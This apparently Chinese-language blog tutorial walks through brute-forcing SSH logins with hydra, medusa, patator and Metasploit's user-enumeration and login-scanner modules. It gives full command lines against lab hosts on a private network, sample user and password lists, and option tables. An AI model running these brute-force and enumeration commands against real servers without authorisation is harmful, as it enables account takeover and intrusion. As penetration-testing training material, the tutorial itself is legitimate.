ssh暴力破解工具

hydra(海德拉)

hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。

-l      #指定用户
-L     #指定用户文件
-P     #指定密码文件
-p      #指定密码
-M     #指定目标主机ip的文件
-t       #指定线程数

先自己做一个用户文件和一个密码文件,当然实际生产中密码文件是不可能自己写的,需要找密码字典来破解密码

root@kali:~# cat userlist.txt
root
jack
tom
alice
admin
root@kali:~# cat passlist.txt
1
2
3
123
1234
12345
123456
23445
root@kali:~# hydra -l root -P passlist.txt 192.168.0.108 ssh
image.png
root@kali:~# hydra -L userlist.txt -P passlist.txt 192.168.0.104 ssh
image.png

medusa(美杜莎)

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行强力测 试。Medusa 和 hydra 一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于 hydra 要好很多,但 其支持模块要比 hydra 少一些

1、语法参数

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] 
-h [TEXT]      目标主机名称或者IP地址 
-H [FILE]      包含目标主机名称或者IP地址文件 
-u [TEXT]      测试的用户名 
-U [FILE]      包含测试的用户名文件 
-p [TEXT]      测试的密码 
-P [FILE]      包含测试的密码文件 
-C [FILE]      组合条目文件 
-O [FILE]      日志信息文件 
-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同 
-M [TEXT]      模块执行名称 
-m [TEXT]      传递参数到模块 
-d             显示所有的模块名称 
-n [NUM]       使用非默认Tcp端口 
-s             启用SSL 
-r [NUM]       重试间隔时间,默认为3秒 
-t [NUM]       设定线程数量 
-T             同时测试的主机总数 
-L             并行化,每个用户使用一个线程 
-f             在任何主机上找到第一个账号/密码后,停止破解 
-F             在任何主机上找到第一个有效的用户名/密码后停止审计 
-q             显示模块的使用信息 
-v [NUM]       详细级别(0-6) 
-w [NUM]       错误调试级别(0-10) 
-V             显示版本 
-Z [TEXT]      继续扫描上一次

/2、破解SSH密码

root@kali:~# medusa -M ssh -h 192.168.0.104 -u root -p 123
root@kali:~# medusa -M ssh -h 192.168.0.104 -u root -p 123456
image.png
root@kali:~# medusa -M ssh -h 192.168.0.104 -U userlist.txt -P passlist.txt 
image.png

image.png

加上root一共三个用户全部破解成功

root@kali:~# cat hostlist.txt
192.168.0.104
192.168.0.108
root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt 
image.png

image.png
root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt -O ssh.log
root@kali:~# cat ssh.log
image.png

patator

强大的命令行暴力破解器

1、可用模块

image.png

2、破解SSH密码

root@kali:~# patator ssh_login --help
Patator v0.6 (http://code.google.com/p/patator/)
Usage: ssh_login <module-options ...> [global-options ...]

Examples:
  ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
root@kali:~# patator ssh_login host=192.168.0.104 user=root password=FILE0 0=passlist.txt
root@kali:~# patator ssh_login host=192.168.0.104 user=root password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed.'
image.png

image.png
root@kali:~# patator ssh_login host=192.168.0.104 user=FILE1 1=userlist.txt password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed.'
image.png
root@kali:~# patator ssh_login host=FILE2 2=hostlist.txt user=FILE1 1=userlist.txt password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed.'
image.png

MSF

Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试, Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语 言,汇编程序和Python编写的可选组件。

1

root@kali:~# msfconsole
msf > search ssh
image.png

image.png

2、用户枚举

msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.0.108
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/userlist.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > run
image.png

SSH版本探测

msf auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version 
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.0.108
msf auxiliary(scanner/ssh/ssh_version) > run
image.png

4、SSH暴力破解

msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.108
msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/userlist.txt 
msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passlist.txt 
msf auxiliary(scanner/ssh/ssh_login) > run
image.png
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 202,529评论 5 475
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,015评论 2 379
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 149,409评论 0 335
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,385评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,387评论 5 364
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,466评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,880评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,528评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,727评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,528评论 2 319
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,602评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,302评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,873评论 3 306
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,890评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,132评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,777评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,310评论 2 342

推荐阅读更多精彩内容